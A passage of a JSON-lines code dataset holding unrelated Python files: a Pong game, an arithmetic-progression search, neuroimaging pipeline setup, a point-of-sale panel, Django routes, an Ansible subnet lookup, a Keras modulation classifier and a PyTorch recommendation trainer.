bola.colision(jugador1,sonido_golpe)\n\t bola.colision(jugador2,sonido_golpe)\n\n\t for event in pygame.event.get():\n\t if event.type == pygame.QUIT:\n\t\t sys.exit(0)\n\t elif event.type == pygame.KEYDOWN:\n\t\t if event.key == K_w:\n\t\t\t jugador1.rect.centery -= 6\n\t\t elif event.key == K_s:\n\t\t jugador1.rect.centery += 6\n\t\t elif event.key == K_ESCAPE:\n\t\t\t sys.exit(0)\n\t #elif mov_mouse[1] != 0:\n\t\t #jugador1.rect.centery = pos_mouse[1]\n \n # actualizar la pantalla\n\t if marcador.ganador != 0:\n\t\t texto = \"Ganador: jugador %d\" % (marcador.ganador)\n\t\t desp = 135\n\t\t bola.ganador()\n\t else:\n\t texto = \"%d | %d\" % (marcador.jugador1, marcador.jugador2)\n\t desp = 42\n\t \n\t mensaje = fuente.render(texto, 1, (255, 255, 255))\n\t \n\t #pygame.draw.aaline(fondo, (191, 191, 191), (0, LINE_HEIGHT), (FULLSCREEN_WIDTH, LINE_HEIGHT))\n\t pygame.draw.line(fondo, (191, 191, 191), (0, LINE_HEIGHT), (FULLSCREEN_WIDTH, LINE_HEIGHT), 4)\n\t screen.blit(fondo, (0,0))\n\t screen.blit(mensaje, (FULLSCREEN_WIDTH/2 - desp, 10))\n\t screen.blit(bola.image, bola.rect)\n\t screen.blit(jugador1.image, jugador1.rect)\n\t screen.blit(jugador2.image, jugador2.rect)\n\t pygame.display.flip()\n\t \n\t if marcador.ganador != 0:\n\t while True:\n\t for event in pygame.event.get():\n\t if event.type == pygame.QUIT:\n\t\t sys.exit(0)\n\t elif event.type == pygame.KEYDOWN:\n\t if event.key == K_ESCAPE:\n\t sys.exit(0)\n\nif __name__ == \"__main__\":\n pygame.init()\n main()\n","sub_path":"Demo 1 - py/pong_lfs.py","file_name":"pong_lfs.py","file_ext":"py","file_size_in_byte":8300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469077929","text":"#\r\n# def findmissingElement(arr) :\r\n# n = len(arr)\r\n# n1 = [0] * (n+1)\r\n# d = 2\r\n# for i in range(len(n1)):\r\n# n1[i] = d * i\r\n#\r\n# for i in range(len(n1)):\r\n# if n1[i] not in arr:\r\n# print(n1[i])\r\n\r\n# Order of N Solution\r\n# def findmissingElement(arr):\r\n# d = 2\r\n# for i in range(len(arr)):\r\n# if arr[i] != arr[0] + d * i:\r\n# return arr[0] + d * i\r\n\r\narr = [0,2,4,6,10,12,14]\r\n\r\ndef findmissingElement(A,min,max ,d):\r\n\r\n if min > max:\r\n raise ValueError(\"min cannot be greater than max\")\r\n mid = (min + max) // 2\r\n\r\n if min == max and A[min] != A[0] + d * min:\r\n return A[0] + d * min\r\n\r\n if A[mid] == A[0] * d * mid:\r\n min = mid +1\r\n else:\r\n max = mid - 1\r\n\r\n findmissingElement(A,min,max,d)\r\n\r\nprint(findmissingElement(arr,0,len(arr)-1,2))","sub_path":"DivideAndConquer/FindMissingElementInAP.py","file_name":"FindMissingElementInAP.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"458848694","text":"\"\"\"\nBuilds, validates, and excecutes parameters for the HCP script \n/opt/HCP-Pipelines/PostFreeSurfer/PostFreeSurferPipeline.sh\npart of the hcp-struct gear\n\"\"\"\nimport os\nimport os.path as op\nimport subprocess as sp\n\nfrom collections import OrderedDict\n\nfrom .common import build_command_list, exec_command\n\n\ndef build(context):\n config = context.config\n environ = context.gear_dict[\"environ\"]\n # Some options that may become user-specified in the future,\n # but use standard HCP values for now\n # Usually 2mm (\"1.6\" also available)\n config[\"GrayordinatesResolution\"] = \"2\"\n # Usually 32k vertices (\"59\" = 1.6mm)\n config[\"LowResMesh\"] = \"32\"\n # (or 170494_Greyordinates = 1.6mm)\n config[\"GrayordinatesTemplate\"] = \"91282_Greyordinates\"\n # Basically always 164k vertices\n config[\"HighResMesh\"] = \"164\"\n\n params = OrderedDict()\n params[\"path\"] = context.work_dir\n params[\"subject\"] = config[\"Subject\"]\n # (Need to rename make surf.gii and add 32k)\n params[\"surfatlasdir\"] = op.join(\n environ[\"HCPPIPEDIR_Templates\"], \"standard_mesh_atlases\"\n )\n # (Need to copy these in)$GrayordinatesSpaceDIR\n params[\"grayordinatesdir\"] = op.join(\n environ[\"HCPPIPEDIR_Templates\"], config[\"GrayordinatesTemplate\"]\n )\n params[\"grayordinatesres\"] = config[\"GrayordinatesResolution\"]\n params[\"hiresmesh\"] = config[\"HighResMesh\"]\n params[\"lowresmesh\"] = config[\"LowResMesh\"]\n params[\"subcortgraylabels\"] = op.join(\n environ[\"HCPPIPEDIR_Config\"], \"FreeSurferSubcorticalLabelTableLut.txt\"\n )\n params[\"freesurferlabels\"] = op.join(\n environ[\"HCPPIPEDIR_Config\"], \"FreeSurferAllLut.txt\"\n )\n params[\"refmyelinmaps\"] = op.join(\n environ[\"HCPPIPEDIR_Templates\"],\n \"standard_mesh_atlases\",\n \"Conte69.MyelinMap_BC.164k_fs_LR.dscalar.nii\",\n )\n # Needs Checking for being FS or MSMSulc otherwise Error.\n params[\"regname\"] = config[\"RegName\"]\n params[\"printcom\"] = \" \"\n # Unaccounted for parameters:\n # CorrectionSigma=`opts_GetOpt1 \"--mcsigma\" $@` DEFAULT: sqrt(200)\n # InflateExtraScale=`opts_GetOpt1 \"--inflatescale\" $@`f DEFAULT: 1\n context.gear_dict[\"POST-params\"] = params\n\n\ndef validate(context):\n params = context.gear_dict[\"POST-params\"]\n if not (params[\"regname\"] in [\"FS\", \"MSMSulc\"]):\n raise Exception('RegName must be \"FS\" or \"MSMSulc\"!')\n\n\ndef execute(context):\n environ = context.gear_dict[\"environ\"]\n command = []\n command.extend(context.gear_dict[\"command_common\"])\n command.append(\n op.join(environ[\"HCPPIPEDIR\"], \"PostFreeSurfer\", \"PostFreeSurferPipeline.sh\")\n )\n command = build_command_list(command, context.gear_dict[\"POST-params\"])\n\n stdout_msg = (\n \"PostFreeSurfer logs (stdout, stderr) will be available \"\n + 'in the file \"pipeline_logs.zip\" upon completion.'\n )\n\n context.log.info(\"PostFreeSurfer command: \\n\")\n exec_command(context, command, stdout_msg=stdout_msg)\n","sub_path":"utils/args/PostFreeSurfer.py","file_name":"PostFreeSurfer.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"179145443","text":"from terminalFrontEnd import terminalPanel\nimport newCust as nc\nimport wx\n\n\nclass cashSalePanel(terminalPanel):\n def __init__(self, parent, transactionButtonName, uid):\n terminalPanel.__init__(self, parent, transactionButtonName, uid)\n\n def CheckOutFunc(self, event):\n if len(self.t.cart.products) == 0:\n return\n\n amt = self.makePopUp(\"Enter Recieved Amount\", \"Amount Recieved\")\n if amt == \"\":\n return\n while amt.isdigit() is False:\n amt = self.makePopUp(\"Enter Recieved Amount (only digits)\", \"Amount Recieved\")\n print(amt)\n\n isprinter = self.t.checkout(int(amt))\n if isprinter is None:\n x = wx.MessageDialog(self, \"Printer not connected\", \"No Printer\", wx.OK)\n x.ShowModal()\n else:\n self.clearCartGrid()\n\n\ndef refundFunc(self, event):\n self.clearCartGrid()\n self.t.returnProducts() # self.m_balanceST.SetFocus()\n","sub_path":"hh/salesPanel.py","file_name":"salesPanel.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"73108127","text":"from django.urls import path, include\nfrom core import views\n\n\napp_name = 'core'\n\nurlpatterns = [\n path('process-list-full/', views.ProcessList, name='process-list'),\n # path('process-list-partner', ProcessListPartner.as_view(), name='process-list-partner'),\n # path('process-list-owner', ProcessListOwner.as_view(), name='process-list-owner'),\n path('process-create/', views.ProcessCreate, name='create'),\n # path('process-detail/', ProcessDetail.as_view(), name='process-detail'),\n path('process-update/', views.ProcessUpdate, name='process-update'),\n path('process-delete/', views.ProcessDelete, name='process-delete'),\n\n\n]","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"262714208","text":"#!/usr/bin/env python\n\nfrom ansible import errors\nfrom netaddr import IPNetwork\n\ntry:\n # ansible-2.0\n from ansible.plugins.lookup import LookupBase\nexcept ImportError:\n # ansible-1.9.x\n class LookupBase(object):\n def __init__(self, basedir=None, runner=None, **kwargs):\n self.runner = runner\n self.basedir = self.runner.basedir\n def get_basedir(self, variables):\n return self.basedir\n\n\nclass LookupModule(LookupBase):\n def __init__(self, basedir=None, **kwargs):\n self.basedir = basedir\n\n def run(self, args, inject=None, **kwargs):\n try:\n domain_cidr=list(args)[0][0]['domain_cidr']\n site_cidr=list(args)[0][1]['site_cidr']\n vpc=list(args)[0][2]['vpc']\n vpc_subnet_azs=list(args)[0][3]['vpc_subnet_azs']\n\n ip = IPNetwork(vpc['vpcs'][0]['cidr_block'])\n subnets = list(ip.subnet(26))\n\n for az in vpc_subnet_azs:\n if len(domain_cidr) < 3:\n if az not in str(domain_cidr):\n for ip in subnets:\n if str(ip) not in str(domain_cidr):\n if str(ip) not in str(site_cidr):\n if int(str(ip).split('.')[2]) > 9:\n if int(str(ip).split('.')[2]) != 111:\n a={}\n a['az'] = az\n a['cidr_block'] = str(ip)\n domain_cidr.append(a)\n break\n if len(domain_cidr) == 3:\n return domain_cidr\n else:\n raise Exception('Error in available subnets: Most likely 3 cidr ranges are not available')\n except Exception as e:\n raise errors.AnsibleError(\"Error: %s\" % (e))","sub_path":"reference-architecture/aws-ansible/playbooks/lookup_plugins/subnet_next_avail_cidr.py","file_name":"subnet_next_avail_cidr.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396652206","text":"\"\"\"\nThis function trains and evaluates a model from RFML\n\nRequires: Python 3.5\nLast modified: 9/13/2017\nLast modified by: Boston Clark Terry\n\"\"\"\n\nimport os, random\nos.environ[\"KERAS_BACKEND\"] = \"tensorflow\"\nos.environ[\"THEANO_FLAGS\"] = \"device=gpu%d\"%(1)\nimport numpy as np\nfrom keras.utils import np_utils\nimport keras.models as models\nfrom keras.layers.core import Reshape,Dense,Dropout,Activation,Flatten\nfrom keras.layers.noise import GaussianNoise\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.regularizers import *\nfrom keras.optimizers import adam\nimport matplotlib.pyplot as plt\nimport pickle\nimport random, sys, keras\nimport pdb\n\n# opens and analyzes a file given as a parameter\nif (len(sys.argv) < 2):\n\tprint (\"needs more args - arg1: data sample to run\")\ndata_file = sys.argv[1]\n\n# Load the file ...\nXd = pickle.load(open(data_file,'rb'),encoding='latin1') # latin encoding used for python3 support\n\n# Extract the labels\nsnrs,mods = map(lambda j: sorted(list(set(map(lambda x: x[j], Xd.keys())))), [1,0])\n # snrs: [-20, -18, -16, -14, -12, -10, -8, -6, -4, -2, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18]\n # mods: ['8PSK', 'AM-DSB', 'AM-SSB', 'BPSK', 'CPFSK', 'GFSK', 'PAM4', 'QAM16', 'QAM64', 'QPSK', 'WBFM']\n\n \n \nX = [] \nlbl = []\nfor mod in mods:\n for snr in snrs:\n X.append(Xd[(mod,snr)])\n for i in range(Xd[(mod,snr)].shape[0]): lbl.append((mod,snr))\n print(str(mod))\nX = np.vstack(X)\n\nn_examples = X.shape[0] \ntest_idx = list(set(range(0,n_examples)))\nX_test = X[test_idx]\n\n# map the labels to outputs\ndef to_onehot(yy):\n\tyy_list = list(yy)\n\tyy1 = np.zeros([len(yy_list), max(yy_list)+1]) # np.zeros(2,1) -> array([[0.0], 0.0]])\n\tyy1[np.arange(len(yy_list)), yy_list] = 1\n\treturn yy1\n\nY_test = to_onehot(map(lambda x: mods.index(lbl[x][0]), test_idx))\n\t\n# set the input shape [2,1024]\nin_shp = list(X_test.shape[1:])\nprint (X_test.shape, in_shp) # (110000, 2, 1024) [2, 1024]\nclasses = ['BPSK', '8PSK', 'QPSK', 'PAM4', 'QAM16', 'QAM64', 'GFSK', 'CPFSK', 'WBFM', 'AM-DSB', 'AM-SSB']\n# all_keys = {\"bpsk\":0,\"8psk\":0, \"qpsk\":0, \"pam4\":0, \"qam16\":0, \"qam64\":0, \"gfsk\":0, \"cpfsk\":0, \"fm\": 1, \"am\": 1, \"amssb\": 1 }\n\n# Build VT-CNN2 Neural Net model using Keras primitives -- \n# - Reshape [N,2,1024] to [N,1,2,1024] on input\n# - Pass through 2 2DConv/ReLu layers\n# - Pass through 2 Dense layers (ReLu and Softmax)\n# - Perform categorical cross entropy optimization\n\ndr = 0.5 # dropout rate (%)\nmodel = models.Sequential()\nmodel.add(Reshape([1]+in_shp, input_shape=in_shp))\nmodel.add(ZeroPadding2D((0, 2), data_format=\"channels_first\"))\nmodel.add(Convolution2D(256, (1, 3), activation=\"relu\", name=\"conv1\", data_format=\"channels_first\"))\nmodel.add(Dropout(dr))\nmodel.add(ZeroPadding2D((0, 2), data_format=\"channels_first\"))\nmodel.add(Convolution2D(80, (2, 3), activation=\"relu\", name=\"conv2\", data_format=\"channels_first\"))\nmodel.add(Dropout(dr))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu', kernel_initializer='he_normal', name=\"dense1\"))\nmodel.add(Dropout(dr))\nmodel.add(Dense( len(classes), kernel_initializer='he_normal', name=\"dense2\" ))\nmodel.add(Activation('softmax'))\nmodel.add(Reshape([len(classes)]))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\nmodel.summary()\n\n# Set up some params \nbatch_size = 256\n\n# open the previously trained model\nfilepath = 'convmodrecnets_CNN2_0.5.wts.h5'\nmodel.load_weights(filepath)\n\n# returns an array of predictions\ny_hat = model.predict(X_test, batch_size=256)\nprint(y_hat)\nprint(y_hat.shape)\n\ndef plot_confusion_matrix(cm, title='Confusion matrix', cmap=plt.cm.Blues, labels=[]):\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(labels))\n plt.xticks(tick_marks, labels, rotation=45)\n plt.yticks(tick_marks, labels)\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n# plot the confusion matrix\t\nconf = np.zeros([len(classes),len(classes)]) # conf: [11x11]\nconfnorm = np.zeros([len(classes),len(classes)]) # confnorm: [11x11]\n\nfor i in range(0,X_test.shape[0]):\n j = list(Y_test[i,:]).index(1)\n k = int(np.argmax(y_hat[i,:]))\n conf[j,k] = conf[j,k] + 1 # increment each time\n\nfor i in range(0,len(classes)):\n confnorm[i,:] = conf[i,:] / np.sum(conf[i,:])\n\nplt.figure()\nplot_confusion_matrix(confnorm, labels=classes) \nplt.show()\n\n# # These errors are probably from trying to divide by zero or NaN\n# # example_training.py:208: RuntimeWarning: invalid value encountered in true_divide\n# # confnorm[i,:] = conf[i,:] / np.sum(conf[i,:])\n\n# # example_training.py:214: RuntimeWarning: invalid value encountered in double_scalars\n# # print (\"Overall Accuracy: \", cor / (cor+ncor))\n\n# # Overall Accuracy: nan\n\n# # example_training.py:215: RuntimeWarning: invalid value encountered in double_scalars\n# # acc[snr] = 1.0*cor/(cor+ncor)\n\n# # just in case we picked up some NaNs\n# np.nan_to_num(confnorm)\n\n# # Plot confusion matrix\n# acc = {}\n# for snr in snrs:\n\n # # extract classes @ SNR\n # test_SNRs = list(map(lambda x: lbl[x][1], test_idx))\n # test_X_i = X_test[np.where(np.array(test_SNRs)==snr)]\n # test_Y_i = Y_test[np.where(np.array(test_SNRs)==snr)] \n\n # # estimate classes\n # test_Y_i_hat = model.predict(test_X_i)\n # conf = np.zeros([len(classes),len(classes)])\n # confnorm = np.zeros([len(classes),len(classes)])\n\n # for i in range(0,test_X_i.shape[0]):\n # j = list(test_Y_i[i,:]).index(1)\n # k = int(np.argmax(test_Y_i_hat[i,:]))\n # conf[j,k] = conf[j,k] + 1\n\n # for i in range(0,len(classes)):\n # confnorm[i,:] = conf[i,:] / np.sum(conf[i,:])\n \n # np.nan_to_num(confnorm)\n \n # plt.figure()\n # plot_confusion_matrix(confnorm, labels=classes, title=\"ConvNet Confusion Matrix (SNR=%d)\"%(snr))\n \n # cor = np.sum(np.diag(conf))\n # ncor = np.sum(conf) - cor\n # print (\"Overall Accuracy: \", cor / (cor+ncor))\n # acc[snr] = 1.0*cor/(cor+ncor)\n \n # # Save results to a pickle file for plotting later\n# print (acc)\n# fd = open('results_cnn2_d0.5.dat','wb')\n# pickle.dump( (\"CNN2\", 0.5, acc) , fd )\n\n \n\n# # Plot accuracy curve\n# plt.figure()\n# plt.plot(snrs, list(map(lambda x: acc[x], snrs)))\n# plt.xlabel(\"Signal to Noise Ratio\")\n# plt.ylabel(\"Classification Accuracy\")\n# plt.title(\"CNN2 Classification Accuracy on RadioML 2016.10 Alpha\")\n# plt.show()\n\n\n","sub_path":"python27/load_net_and_run_sample.py","file_name":"load_net_and_run_sample.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6753222","text":"import sqlite3\n\nimport database.factory\n\ndef load_privatentnahmen(sqlite_file):\n\n conn = sqlite3.connect(sqlite_file)\n conn.row_factory = database.factory.dict_factory\n c = conn.cursor()\n\n c.execute(\"SELECT oid, * FROM privatentnahmen ORDER BY datum DESC\")\n privatentnahmen = c.fetchall()\n\n conn.close()\n\n return privatentnahmen\n\ndef save_privatentnahmen(sqlite_file, pe):\n\n conn = sqlite3.connect(sqlite_file)\n c = conn.cursor()\n\n eurkonto = 0\n\n if(pe['typ'] == '0'):\n eurkonto = 108 #: Sonstige Sach-, Nutzungs- und Leistungsentnahmen\n else:\n eurkonto = 164 #: Geschenke\n\n c.execute(\"INSERT INTO privatentnahmen (datum, artikel_id, anzahl, typ, eurkonto) VALUES(?, ?, ?, ?, ?)\", [ pe['datum'], pe['artikel_id'], pe['anzahl'], pe['typ'], eurkonto ] )\n\n conn.commit()\n conn.close()\n","sub_path":"database/privatentnahmen.py","file_name":"privatentnahmen.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132848083","text":"import os\nimport sys\nimport json\nimport time\nimport torch\nimport pickle\nimport argparse\nimport numpy as np\nfrom torch import nn\nfrom loader.logger import Tee\nfrom collections import OrderedDict\nfrom model.RNN_torch import Recommend\nfrom sklearn.metrics import accuracy_score, mean_squared_error\nfrom loader.utils import create_recommend\nfrom loader.data_loader import load_recommend\nfrom loader.dataset import Recommend_Dataset, Recommend_Processor\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--word_dim\", default=\"128\",\n type=int, help=\"Token embedding dimension\"\n)\nparser.add_argument(\n \"--feature_dim\", default=\"4\",\n type=int, help=\"Feature embedding dimension\"\n)\nparser.add_argument(\n \"--hidden_dim\", default=\"64\",\n type=int, help=\"Hidden dimension\"\n)\nparser.add_argument(\n \"--model_dp\", default=\"models/recommend_models/\",\n help=\"model directory path\"\n)\nparser.add_argument(\n \"--gpu\", default=\"1\",\n type=int, help=\"default is 1. set 0 to disable use gpu.\"\n)\nparser.add_argument(\n \"--batch_size\", default=\"32\",\n type=int, help=\"Batch size.\"\n)\nparser.add_argument(\n \"--dropout\", default=\"0.4\",\n type=float, help=\"Dropout on the embeddings (0 = no dropout)\"\n)\nparser.add_argument(\n \"--layer_dropout\", default=\"0.2\",\n type=float, help=\"Dropout on the embeddings (0 = no dropout)\"\n)\nparser.add_argument(\n \"--max_len\", default=\"200\",\n type=int, help=\"Max length.\"\n)\nparser.add_argument(\n \"--freq\", default=\"1\",\n type=int, help=\"Min freq.\"\n)\nparser.add_argument(\n \"--lr_rate\", default=\"0.0001\",\n type=float, help=\"Learning rate\"\n)\nparser.add_argument(\n \"--data_path\", default=\"data\",\n help=\"data directory path\"\n)\nparser.add_argument(\n \"--load\", action='store_true', help=\"Load dataset.\"\n)\nparser.add_argument(\n \"--num_epochs\", default=\"80\",\n type=int, help=\"Number of training epochs\"\n) \nparser.add_argument(\n \"--model\", default=\"best_dev_model.pth.tar\",\n help=\"Model location\"\n)\nargs = parser.parse_args()\n\nparameters = OrderedDict()\nparameters['freq'] = args.freq\nparameters['w_dim'] = args.word_dim\nparameters['f_dim'] = args.feature_dim\nparameters['h_dim'] = args.hidden_dim\nparameters['input_dropout'] = args.dropout\nparameters['layer_dropout'] = args.layer_dropout\nparameters['gpu'] = args.gpu == 1\nparameters['batch_size'] = args.batch_size\nparameters['max_len'] = args.max_len\nparameters['lr_rate'] = args.lr_rate\n\nparameters['data'] = 'acl_2017'\nmodel_dir = args.model_dp\nmodel_name = ['RNN']\nmodel_dir = args.model_dp\nfor k, v in parameters.items():\n if v == \"\":\n continue\n if k == 'pre_emb':\n v = os.path.basename(v)\n model_name.append('='.join((k, str(v))))\nmodel_dir = os.path.join(model_dir, parameters['data'] +','.join(model_name[:-1]))\nos.makedirs(model_dir, exist_ok=True)\n\n\nparameters['num_class'] = 5\n\ntraining_log_path = os.path.join(model_dir, 'training_log.txt')\nif os.path.exists(training_log_path):\n os.remove(training_log_path)\nf = open(training_log_path, 'w')\nsys.stdout = Tee(sys.stdout, f)\n\n\nif args.load:\n state = pickle.load(open(args.data_path + '/recommend_dataset.pth', 'rb'))\n mappings = state['mappings']\n r_dataset = state['r_dataset']\n v_dataset = state['v_dataset']\n t_dataset = state['t_dataset']\nelse:\n words, r_dataset = load_recommend(parameters['data'] + '/RECOMMENDATION_train.json', True)\n mappings = create_recommend(words, parameters['freq'])\n v_dataset = load_recommend(parameters['data'] + '/RECOMMENDATION_valid.json')\n t_dataset = load_recommend(parameters['data'] + '/RECOMMENDATION_test.json')\n state = {\n 'mappings': mappings,\n 'r_dataset': r_dataset,\n 'v_dataset': v_dataset,\n 't_dataset': t_dataset\n }\n pickle.dump(state, open(args.data_path + '/recommend_dataset.pth', \"wb\"))\n\nword2id = mappings['word2id']\nid2word = mappings['id2word']\nvocab_size = len(mappings['id2word'])\n\nfa1_bins = mappings['fa1']\nfa1_size = len(fa1_bins) + 1\n\nfa2_bins = mappings['fa2']\nfa2_size = len(fa2_bins) + 1\n\nfr1_bins = mappings['fr1']\nfr1_size = len(fr1_bins) + 1\n\nfr2_bins = mappings['fr2']\nfr2_size = len(fr2_bins) + 1\n\nfs1_bins = mappings['fs1']\nfs1_size = len(fs1_bins) + 1\n\nfs2_bins = mappings['fs2']\nfs2_size = len(fs2_bins) + 1\n\nfn1_bins = mappings['fn1']\nfn1_size = len(fn1_bins) + 1\n\nfn2_bins = mappings['fn2']\nfn2_size = len(fn2_bins) + 1\n\nfi1_bins = mappings['fi1']\nfi1_size = len(fi1_bins) + 1\n\n\ndevice = torch.device(\"cuda:1\" if torch.cuda.is_available() and parameters['gpu'] else \"cpu\")\n\ntrain_dataset = Recommend_Dataset(r_dataset, word2id, fa1_bins, fa2_bins, fs1_bins, fs2_bins, fn1_bins, fn2_bins, fr1_bins, fr2_bins, fi1_bins, parameters['max_len'])\nvalid_dataset = Recommend_Dataset(v_dataset, word2id, fa1_bins, fa2_bins, fs1_bins, fs2_bins, fn1_bins, fn2_bins, fr1_bins, fr2_bins, fi1_bins, parameters['max_len'])\ntest_dataset = Recommend_Dataset(t_dataset, word2id, fa1_bins, fa2_bins, fs1_bins, fs2_bins, fn1_bins, fn2_bins, fr1_bins, fr2_bins, fi1_bins, parameters['max_len'])\n\napro_proc = Recommend_Processor()\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers=2,\n pin_memory=False,\n collate_fn=apro_proc.process\n)\n\nval_loader = torch.utils.data.DataLoader(\n valid_dataset,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers=2,\n pin_memory=False,\n collate_fn=apro_proc.process\n)\n\ntest_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=args.batch_size,\n shuffle=True,\n num_workers=2,\n pin_memory=False,\n collate_fn=apro_proc.process\n)\n\nembed_layer_word = nn.Embedding(vocab_size, args.word_dim, padding_idx=0, sparse=False)\nembed_layer_fa1 = nn.Embedding(fa1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fa2 = nn.Embedding(fa2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fs1 = nn.Embedding(fs1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fs2 = nn.Embedding(fs2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fn1 = nn.Embedding(fn1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fn2 = nn.Embedding(fn2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fr1 = nn.Embedding(fr1_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fr2 = nn.Embedding(fr2_size, args.feature_dim, padding_idx=0, sparse=False)\nembed_layer_fi1 = nn.Embedding(fi1_size, args.feature_dim, padding_idx=0, sparse=False)\n\nmodel = Recommend(embed_layer_word, embed_layer_fa1, embed_layer_fa2, embed_layer_fs1, embed_layer_fs2, embed_layer_fn1, embed_layer_fn2, embed_layer_fr1, embed_layer_fr2, embed_layer_fi1, **parameters)\ncriterion = nn.CrossEntropyLoss().to(device)\nmodel = model.to(device)\noptimizer = torch.optim.RMSprop(model.parameters(), args.lr_rate, weight_decay=0.9)\n\nbest_dev = np.inf\nnum_epochs = args.num_epochs\nstart_epoch = 0\nepoch_examples_total = len(train_dataset)\nprint('train batches', epoch_examples_total)\n\nfor epoch in range(num_epochs):\n time_epoch_start = time.time()\n model.train(True)\n epoch_loss = 0\n for batch_idx, (batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s, batch_tgt, batch_ids, _) in enumerate(train_loader):\n\n batch_txts =batch_txts.to(device)\n\n batch_fa1s = batch_fa1s.to(device)\n batch_fa2s = batch_fa2s.to(device)\n batch_fs1s = batch_fs1s.to(device)\n batch_fs2s = batch_fs2s.to(device)\n batch_fn1s = batch_fn1s.to(device)\n batch_fn2s = batch_fn2s.to(device)\n batch_fr1s = batch_fr1s.to(device)\n batch_fr2s = batch_fr2s.to(device)\n batch_fi1s = batch_fi1s.to(device)\n batch_tgt = batch_tgt.to(device)\n\n prob = model(batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s)\n batch_loss = criterion(prob, batch_tgt)\n\n optimizer.zero_grad()\n batch_loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 5)\n epoch_loss += batch_loss.item() * batch_txts.size(0)\n loss = batch_loss.item()\n optimizer.step()\n\n sys.stdout.write(\n '%d batches processed. current batch loss: %f\\r' %\n (batch_idx, loss)\n )\n sys.stdout.flush()\n\n epoch_loss_avg = epoch_loss / float(epoch_examples_total)\n print('Epoch: ', epoch, 'Train Loss: ', epoch_loss_avg)\n \n aspect_all_ys = []\n aspect_all_ys_ = []\n aspect_ids = []\n\n dev_loss = 0\n model.eval()\n for batch_idx, (batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s, batch_tgt, batch_ids, _) in enumerate(val_loader):\n batch_txts =batch_txts.to(device)\n\n batch_fa1s = batch_fa1s.to(device)\n batch_fa2s = batch_fa2s.to(device)\n batch_fs1s = batch_fs1s.to(device)\n batch_fs2s = batch_fs2s.to(device)\n batch_fn1s = batch_fn1s.to(device)\n batch_fn2s = batch_fn2s.to(device)\n batch_fr1s = batch_fr1s.to(device)\n batch_fr2s = batch_fr2s.to(device)\n batch_fi1s = batch_fi1s.to(device)\n batch_tgt = batch_tgt.to(device)\n\n prob = model(batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s)\n batch_loss = criterion(prob, batch_tgt)\n\n dev_loss += batch_loss.item() * batch_txts.size(0)\n loss = batch_loss.item()\n sys.stdout.flush()\n\n symbols = prob.topk(1)[1].squeeze(1)\n aspect_all_ys_.extend(symbols.tolist())\n aspect_all_ys.extend(batch_tgt.tolist())\n aspect_ids.extend(batch_ids)\n dev_loss = accuracy_score(aspect_all_ys, aspect_all_ys_)\n\n epoch_loss_avg = dev_loss / float(epoch_examples_total)\n print('Epoch: ', epoch, 'Valid Loss: ', epoch_loss_avg)\n if dev_loss < best_dev:\n best_dev = dev_loss\n state = {\n 'epoch': start_epoch + epoch + 1,\n 'model': model.state_dict(),\n 'best_prec1': best_dev\n }\n torch.save(state, os.path.join(model_dir,'best_dev_model.pth.tar'))\nstate = torch.load(os.path.join(model_dir,'best_dev_model.pth.tar'))\nstate_dict = state['model']\nmodel.load_state_dict(state_dict)\n\naspect_all_ys = []\naspect_all_ys_ = []\naspect_all_ys_avg = []\naspect_ids = []\nfor batch_idx, (batch_txts, batch_lens, batch_fa1s, batch_fa2s, batch_fs1s, batch_fs2s, batch_fn1s, batch_fn2s, batch_fr1s, batch_fr2s, batch_fi1s, batch_tgt, batch_ids, batch_avg) in enumerate(test_loader):\n\n batch_txts =batch_txts.to(device)\n\n batch_fa1s = batch_fa1s.to(device)\n batch_fa2s = batch_fa2s.to(device)\n batch_fs1s = batch_fs1s.to(device)\n batch_fs2s = 